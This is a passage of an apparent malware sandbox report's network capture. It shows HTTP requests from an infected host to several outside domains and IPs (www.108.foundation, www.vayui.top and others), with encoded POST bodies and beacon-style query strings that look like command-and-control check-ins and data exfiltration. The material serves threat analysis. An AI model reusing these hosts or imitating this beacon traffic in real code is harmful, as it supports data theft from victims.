                                                                                Data Ascii: 2WLcH=U3A76ahUqyCMb4vpGXHzTB1Nslt6/V0RPZvCxg07tRIKgewwIMQdw6W+AhEk/WqIe3R4FC7Hw9Vx5EEAJoDY2D7UV9dn5x2g+553Vpuip45WwMGm11tfD9GoPIYpwY9hjG3UPK37cJFvzHcwW+GB8G9UVyI4L2toWOk6G8U1Wn3xIrNC1wmFVXFBafj10aok4bHO52nGzKtnYJYCcr9Qhmf6l9MuqChotUUbOddnLi/XH6eY7E/9FSHeMiTd6Le3Do2E72MtXyn9bzecPBf5ICxtfLermjNnmYAJ52tzREWpDfQU18oXX6LuyncN4d/PcWrehfpTEfOOt7U59kJh9VOK+/BwxolyDazvpn7ibNguEwXGPeRZIolprs92FAkTU34357CM7/Qej2+47vFfeP7h+FCQjqJDEMiUKV/4r+X+W9154sIA001JSBn5P6btHI87s9JjffiGYWGVsadZovvWHzj9Zo6lb2QjmKrDP+n14FUsOH6uQlbCx+9aNrs5uKShvmC53q2MIFkjVokKhDDZU+FFi/mAxTE+mG1UOHhL5XRgSDOvbciDT7k8A5KdT28kYp9wui8k0pTwVx7+MeIjj16I/7jsOBWm7Q82q04w49JVqfrTzvfVgXdDZRTXcH747VtNA7CXRqkcU3gaLbORpLgErY6A1kMgFEgbtsL2zHjjdd7/hxWsZ+BdI9J2He+a+Bw/UZvxyyMBf1p2BsuSXWmGMYLSwfH8xW8c/weXbV5jt+tQJ6wd5VZO8ONi3o1428Vv4xT5gHw/b0fkAoUmMPhf6eaj+ACOd80dEyT4Rl3X3MSWkC7YdfinAVBbFaIrgOIdOb7ie2AaKrR5iw82ruzGlHDhZYBrHNixcLVDdcron9Sk90V64BlYxCdP1muvDHmfnsa7dTn0oadFz3SqYGKwrG+7X+FmH/Ws4xRhm2Vg1p8mAe0OWF5zqPLgKmxcFF+mbyohwcyKL2DBo0mHvg5zv3cO6CMRFuThgW4t7a [TRUNCATED]
                                                                                Nov 25, 2024 12:00:16.649123907 CET5306OUTData Raw: 31 4d 52 4d 2b 48 6c 5a 77 55 69 74 64 76 4e 70 58 53 6a 77 72 36 43 66 4a 61 68 33 38 48 70 38 52 39 57 74 47 54 65 41 68 30 71 41 67 67 6c 54 6d 75 35 71 77 31 59 2b 47 42 4b 71 6b 39 61 55 32 34 49 66 4e 72 4e 64 79 37 57 61 54 6b 58 2b 7a 4e
                                                                                Data Ascii: 1MRM+HlZwUitdvNpXSjwr6CfJah38Hp8R9WtGTeAh0qAgglTmu5qw1Y+GBKqk9aU24IfNrNdy7WaTkX+zN0U+hxBv2u7fp6QVKJyvHXhMh14J8sm4xyR1b3QONujV7w9xhGSWhHMa4KmwH9nfPhI5MlECLCOqKi7pyn+5Mz/OPJ26caVmX5JzHYjXZlP9vn/7Vy9syf618lA602AdxqoTkl8xsjt591d9cL2mEPXAFcQIvY8Gu1
                                                                                Nov 25, 2024 12:00:16.821852922 CET413INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:16 GMT
                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6a 33 76 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ij3v/ was not found on this server.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                45192.168.11.204978645.81.23.2580
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:00:19.344767094 CET453OUTGET /ij3v/?2WLcH=Z1ob5t14nDPacJC0EUrCTzBKiEN+xlFbGZTgiBJJl0QL8NgJJ8ECyZW/F0sl+HO9WEhrMzz4zoZTxRA1IM3jizzPUf5s72Oblbx3ef6zp59TnsaC/1UaQJc=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.aquax.cloud
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:00:19.517625093 CET413INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:19 GMT
                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6a 33 76 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ij3v/ was not found on this server.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                46192.168.11.204978713.248.169.4880
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:00:32.897140980 CET724OUTPOST /h7t0/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.108.foundation
                                                                                Origin: http://www.108.foundation
                                                                                Referer: http://www.108.foundation/h7t0/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 33 52 6a 2b 7a 66 45 2b 6d 66 36 79 4f 30 74 39 43 2f 74 63 4f 4f 46 79 50 63 6a 46 73 6d 36 59 6f 77 49 2b 71 58 51 57 4f 74 5a 55 47 49 6f 43 43 56 77 55 58 65 38 2b 61 68 32 39 54 41 51 6b 54 6d 79 79 43 53 65 50 6c 31 37 4f 68 77 2b 42 32 72 66 72 62 76 54 4d 52 75 52 66 62 51 6c 4e 78 50 69 34 4e 76 41 78 79 72 45 76 76 50 51 4a 41 2f 32 6d 41 70 5a 31 55 63 61 57 33 2b 30 56 6b 74 7a 52 44 31 59 55 65 69 66 65 76 64 2b 63 42 4b 66 6d 2b 6f 48 6e 79 68 43 51 33 6c 34 4d 4a 71 45 75 68 68 65 36 68 54 5a 58 59 50 6c 38 79 72 77 37 71 79 4a 4f 6f 4a 68 34 32 59 49 51 5a 41 3d 3d
                                                                                Data Ascii: 2WLcH=3Rj+zfE+mf6yO0t9C/tcOOFyPcjFsm6YowI+qXQWOtZUGIoCCVwUXe8+ah29TAQkTmyyCSePl17Ohw+B2rfrbvTMRuRfbQlNxPi4NvAxyrEvvPQJA/2mApZ1UcaW3+0VktzRD1YUeifevd+cBKfm+oHnyhCQ3l4MJqEuhhe6hTZXYPl8yrw7qyJOoJh42YIQZA==


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                47192.168.11.204978813.248.169.4880
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:00:35.524068117 CET744OUTPOST /h7t0/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.108.foundation
                                                                                Origin: http://www.108.foundation
                                                                                Referer: http://www.108.foundation/h7t0/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 33 52 6a 2b 7a 66 45 2b 6d 66 36 79 50 55 64 39 45 59 42 63 5a 65 46 78 52 73 6a 46 6a 47 36 63 6f 78 30 2b 71 57 55 47 4f 66 4e 55 47 72 38 43 42 51 45 55 62 2b 38 2b 52 42 32 34 58 41 51 2f 54 6d 2b 41 43 54 69 50 6c 31 66 4f 68 77 4f 42 32 59 33 73 59 66 54 4f 5a 4f 52 64 56 77 6c 4e 78 50 69 34 4e 76 55 58 79 76 6f 76 73 2f 41 4a 61 61 57 70 4b 4a 59 48 45 73 61 57 38 65 30 52 6b 74 79 43 44 77 35 42 65 68 6e 65 76 66 6d 63 42 37 66 6c 72 59 48 70 74 52 44 34 38 6c 6c 2f 4a 61 6f 54 71 42 57 78 6f 58 31 73 64 5a 6f 6d 76 5a 45 66 70 68 56 38 73 35 59 51 30 61 4a 4c 45 4e 73 58 67 41 67 57 31 4e 38 52 30 2b 55 68 41 7a 4d 33 36 48 63 3d
                                                                                Data Ascii: 2WLcH=3Rj+zfE+mf6yPUd9EYBcZeFxRsjFjG6cox0+qWUGOfNUGr8CBQEUb+8+RB24XAQ/Tm+ACTiPl1fOhwOB2Y3sYfTOZORdVwlNxPi4NvUXyvovs/AJaaWpKJYHEsaW8e0RktyCDw5BehnevfmcB7flrYHptRD48ll/JaoTqBWxoX1sdZomvZEfphV8s5YQ0aJLENsXgAgW1N8R0+UhAzM36Hc=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                48192.168.11.204978913.248.169.4880
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:00:38.164416075 CET7893OUTPOST /h7t0/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.108.foundation
                                                                                Origin: http://www.108.foundation
                                                                                Referer: http://www.108.foundation/h7t0/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 33 52 6a 2b 7a 66 45 2b 6d 66 36 79 50 55 64 39 45 59 42 63 5a 65 46 78 52 73 6a 46 6a 47 36 63 6f 78 30 2b 71 57 55 47 4f 66 31 55 47 62 67 43 42 33 59 55 61 2b 38 2b 53 42 32 35 58 41 52 6c 54 6d 6e 4a 43 54 75 78 6c 33 58 4f 67 54 47 42 77 74 44 73 44 76 54 4f 62 4f 52 63 62 51 6c 69 78 50 7a 51 4e 76 45 58 79 76 6f 76 73 38 6f 4a 4d 66 32 70 5a 5a 5a 31 55 63 61 73 33 2b 30 74 6b 74 72 33 44 77 38 36 65 52 48 65 32 2f 32 63 53 39 72 6c 33 49 47 50 73 52 44 67 38 6c 70 67 4a 61 30 6c 71 42 7a 6d 6f 52 31 73 66 66 35 67 72 72 35 44 33 68 42 41 6b 74 4d 53 37 5a 46 42 61 66 41 73 68 68 73 37 71 4c 63 64 31 6f 41 4a 55 51 51 4f 6e 54 2b 38 69 43 55 59 43 45 74 45 37 6e 62 32 77 57 33 6d 62 32 4d 66 48 52 67 2b 72 48 38 2b 63 57 47 4d 72 6a 45 76 6d 51 74 51 48 6f 67 2b 2b 4c 48 65 68 7a 61 64 41 59 68 6c 67 44 6f 62 2f 6a 66 42 69 38 42 6f 2b 5a 5a 5a 37 4b 4d 6e 58 56 58 71 66 62 31 5a 41 62 2f 33 46 50 2f 53 45 4c 32 33 6d 6c 79 79 4d 4b 2f 72 58 76 39 37 65 58 69 62 6d 30 49 47 [TRUNCATED]
                                                                                Data Ascii: 2WLcH=3Rj+zfE+mf6yPUd9EYBcZeFxRsjFjG6cox0+qWUGOf1UGbgCB3YUa+8+SB25XARlTmnJCTuxl3XOgTGBwtDsDvTObORcbQlixPzQNvEXyvovs8oJMf2pZZZ1Ucas3+0tktr3Dw86eRHe2/2cS9rl3IGPsRDg8lpgJa0lqBzmoR1sff5grr5D3hBAktMS7ZFBafAshhs7qLcd1oAJUQQOnT+8iCUYCEtE7nb2wW3mb2MfHRg+rH8+cWGMrjEvmQtQHog++LHehzadAYhlgDob/jfBi8Bo+ZZZ7KMnXVXqfb1ZAb/3FP/SEL23mlyyMK/rXv97eXibm0IGRY3j8FewJFw7hY0mrWilBWQr3FVX8oMogBgTkY1d2sUmrOXuFP06CA+El0MuofMWFOtRi02f+SwRzbtxMhcQ9tXiHHZcbG0MFJL36noFwEBp6lb5zoNGOtJZCvVkyU3YRaL9jW67wXNckyb1+ymM9iXHVMe2sO+ZGkaWhETbc7oWuQ3nRVveucFcv3n05P4dawGd6q3CC82ouDp7MBpusz4YLQM0wUjqtulQhZahSj5Z2f6/gfslblqqsq/cEoMT8xQjS1j+bkh4xx6FYhZbHL++CehBIIgN+bnq6obCjzWg7hEnJudNPSytwQdMmQ+W+zhTfNWA4DVucJi4ADAWzH9r3Ci7pJpd8mHEybfH5jzk3ZGbrZYKvtCWwF41hG8+PCgFleEXORxFDKHcFLE27WTDXP0hO+FcxqF208MbOVEB/NxXL7NqofZJn9ajx7v6FVhkVsJzsrB6QxdDoF0u7IEglfQk313JUdtQC8c7PU8ZSss1EAULmVXijMHPRGGkA7q88UoPpTmzQW1NQINgT+FCGZ2Q9+EJwi1SQ3kj8lYIXTIc5ATnj5BIW24ErkW/fILv51tdag1pjy/2s6su+p8MtQNoe97JsIVogkfXC+QPUCnNJwT9oPBKdrQmESPleYao+/lK1QljzKRdXq6e7xe5iL2v1EVZ/B [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                49192.168.11.204979013.248.169.4880
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:00:40.802793980 CET456OUTGET /h7t0/?2WLcH=6TLewr8yhertJGkqH+FQWeFrQNLAh3ybhDcYvQV/Hdp8NbM7L1MKR/llezyAaDw0ekOxFhGBkmvPnBSy2dX3PczRZMZfTyd1n8zEZdYU3+dh/YokLdnKa7I=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.108.foundation
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:00:40.907938004 CET394INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Mon, 25 Nov 2024 11:00:40 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 254
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 57 4c 63 48 3d 36 54 4c 65 77 72 38 79 68 65 72 74 4a 47 6b 71 48 2b 46 51 57 65 46 72 51 4e 4c 41 68 33 79 62 68 44 63 59 76 51 56 2f 48 64 70 38 4e 62 4d 37 4c 31 4d 4b 52 2f 6c 6c 65 7a 79 41 61 44 77 30 65 6b 4f 78 46 68 47 42 6b 6d 76 50 6e 42 53 79 32 64 58 33 50 63 7a 52 5a 4d 5a 66 54 79 64 31 6e 38 7a 45 5a 64 59 55 33 2b 64 68 2f 59 6f 6b 4c 64 6e 4b 61 37 49 3d 26 5a 51 3d 39 77 36 65 4f 75 61 79 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2WLcH=6TLewr8yhertJGkqH+FQWeFrQNLAh3ybhDcYvQV/Hdp8NbM7L1MKR/llezyAaDw0ekOxFhGBkmvPnBSy2dX3PczRZMZfTyd1n8zEZdYU3+dh/YokLdnKa7I=&ZQ=9w6eOuayM"}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                50192.168.11.2049791195.110.124.13380
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:00:57.340029955 CET463OUTGET /vlg0/?ZQ=9w6eOuayM&2WLcH=qomJeF/TtZ0QUZ/lu9bWw6fKKq403Qj3n7TxRqREffWgONqaapTJsxm8a+ti36YSjfwaEcz7GfWHOzY8D/KxmBZDEE3LvMzzAWoLAjA157mklULIe55/Q78= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.officinadelpasso.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 12:00:57.538007975 CET367INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:00:57 GMT
                                                                                Server: Apache
                                                                                Content-Length: 203
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6c 67 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                51192.168.11.2049792172.67.145.23480
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:02.650437117 CET709OUTPOST /4twy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Referer: http://www.vayui.top/4twy/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 78 39 72 38 66 73 62 6d 7a 32 4f 38 69 4d 43 57 46 50 57 4d 78 43 6a 49 6e 6b 36 6d 67 66 6a 48 6c 72 69 50 6d 41 63 33 58 34 73 55 46 69 39 69 48 79 79 67 79 72 4f 45 48 2f 54 4f 58 43 45 4c 41 34 2b 2f 4f 64 58 46 48 64 49 39 6a 53 79 6f 45 79 35 38 62 35 77 75 31 54 57 6d 2f 45 71 53 37 49 4b 63 69 72 54 35 66 57 49 33 75 66 4a 47 4a 43 61 54 39 59 31 6e 68 73 35 6a 46 6f 51 57 34 65 6e 6e 68 62 63 7a 6f 4e 4f 37 78 69 64 6b 73 6e 4e 35 53 57 64 37 76 57 57 49 4f 4d 78 64 73 45 50 67 61 48 52 56 37 32 4b 65 54 38 37 31 64 71 4d 43 32 51 3d 3d
                                                                                Data Ascii: 2WLcH=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5SWd7vWWIOMxdsEPgaHRV72KeT871dqMC2Q==
                                                                                Nov 25, 2024 12:01:03.194276094 CET879INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:01:03 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qp%2FrSJCndQU5i6jaNo8R7BcjAEG7dYVXxX1OShSnjeGcAhuk0zEEhaIYcpapxUEIK7kSm%2BpiEyMs5UqiNxRjclIFrAT%2FOYmT2A1twJjJEB5JYBHoPNBOXg%2BzMJBWeFnk"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e812373da88de92-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97292&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=709&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                Nov 25, 2024 12:01:03.194318056 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                52192.168.11.2049793172.67.145.23480
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:05.274791956 CET729OUTPOST /4twy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
                                                                                Referer: http://www.vayui.top/4twy/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 6a 73 62 38 64 50 44 6d 30 57 4f 37 2b 63 43 57 4c 76 57 49 78 43 66 49 6e 67 6a 68 68 74 33 48 6b 4f 47 50 30 56 6f 33 51 34 73 55 4e 43 39 6e 59 69 7a 73 79 72 43 69 48 36 37 4f 58 43 51 4c 41 34 4f 2f 4f 71 37 43 47 4e 49 2f 6c 53 79 75 5a 43 35 38 62 35 77 75 31 51 72 44 2f 45 79 53 37 34 61 63 6a 4a 37 36 44 47 49 77 76 66 4a 47 4e 43 61 58 39 59 31 4a 68 75 64 64 46 72 6f 57 34 62 4c 6e 68 4b 63 77 69 4e 4f 39 76 53 63 74 73 31 56 30 55 48 42 4b 6e 31 50 56 55 73 52 32 74 53 43 36 48 31 6c 78 34 6c 57 73 58 4d 43 64 66 6f 4e 5a 72 56 76 55 54 56 43 32 58 33 2b 31 2b 5a 77 39 73 4a 37 69 45 44 41 3d
                                                                                Data Ascii: 2WLcH=rDqkmhD2LOnTjsb8dPDm0WO7+cCWLvWIxCfIngjhht3HkOGP0Vo3Q4sUNC9nYizsyrCiH67OXCQLA4O/Oq7CGNI/lSyuZC58b5wu1QrD/EyS74acjJ76DGIwvfJGNCaX9Y1JhuddFroW4bLnhKcwiNO9vScts1V0UHBKn1PVUsR2tSC6H1lx4lWsXMCdfoNZrVvUTVC2X3+1+Zw9sJ7iEDA=
                                                                                Nov 25, 2024 12:01:05.526657104 CET784INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 11:01:05 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j6UgWDk98jllv1zS3o2TUEZoLkkiCtOCf85ghPYsVB11h%2BrUbdprfRfwyW7ogqJA0xRAb7rSqBD%2F7pjkkNyWOuitnJXSPILoiSrm1%2BY5nalIQkDXt702NCM5XIA8P%2Bqt"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8123844c1742d4-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=97389&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                Data Ascii: f
                                                                                Nov 25, 2024 12:01:05.526724100 CET105INData Raw: 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9
                                                                                Data Ascii: 63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                Nov 25, 2024 12:01:05.526755095 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                53192.168.11.2049794172.67.145.23480
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:07.899456024 CET2578OUTPOST /4twy/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.vayui.top
                                                                                Origin: http://www.vayui.top
